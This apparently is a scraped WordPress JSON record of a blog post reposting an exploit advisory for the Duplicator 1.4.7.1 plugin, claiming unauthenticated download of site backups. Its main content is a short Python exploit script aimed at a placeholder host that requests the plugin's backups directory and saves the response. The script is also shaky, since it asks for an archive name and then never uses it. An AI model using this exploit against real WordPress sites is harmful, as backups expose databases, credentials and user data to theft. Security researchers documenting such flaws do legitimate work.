## Title: WordPress Plugin Duplicator 1.4.7.1 – Unauthenticated Backup Download
\n## Author: nu11secur1ty
\n## Date: 08.08.2022
\n## Vendor: https:\/\/wordpress.org\/
\n## Software: https:\/\/wordpress.org\/plugins\/duplicator\/
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin\/1.4.7.1<\/p>\n
## Description:
\nThe WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated
\nBackup Download, after an update from the 1.4.7 version.
\nThe attacker can download all archive information from the system by
\nusing this vulnerability!<\/p>\n
Status: CRITICAL<\/p>\n
[+] Exploit:<\/p>\n
“`python
\n#!\/usr\/bin\/python
\n# Author nu11secur1ty
\nimport requests
\nimport time<\/p>\n
vulnerableURL = “http:\/\/pwned_host.com\/wordpress\/wp-content\/backups-dup-lite\/”
\narchive=input(“Give the name of the archive…\\n”)
\nresponse = requests.get(vulnerableURL)
\ntime.sleep(5)
\nopen(archive, “wb”).write(response.content)
\nprint(“Right now, you just downloaded the secret archive =)\\n”)<\/p>\n
“`<\/p>\n
## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin\/1.4.7.1)<\/p>\n
## Proof and Exploit:
\n[href](https:\/\/streamable.com\/ee11bg)<\/p>\n
—
\nSystem Administrator – Infrastructure Engineer
\nPenetration Testing Engineer
\nExploit developer at https:\/\/packetstormsecurity.com\/
\nhttps:\/\/cve.mitre.org\/index.html and https:\/\/www.exploit-db.com\/
\nhome page: https:\/\/www.nu11secur1ty.com\/
\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=
\nnu11secur1ty <http:\/\/nu11secur1ty.com\/><\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: WordPress Plugin Duplicator 1.4.7.1 – Unauthenticated Backup Download ## Author: nu11secur1ty ## Date: 08.08.2022 ## Vendor: https:\/\/wordpress.org\/ ## Software: https:\/\/wordpress.org\/plugins\/duplicator\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin\/1.4.7.1 ## Description: The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated Backup Download, after an update from the 1.4.7 version. The attacker can download all archive information from the system by …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29031","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29031","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29031"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29031\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29031"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29031"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29031"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}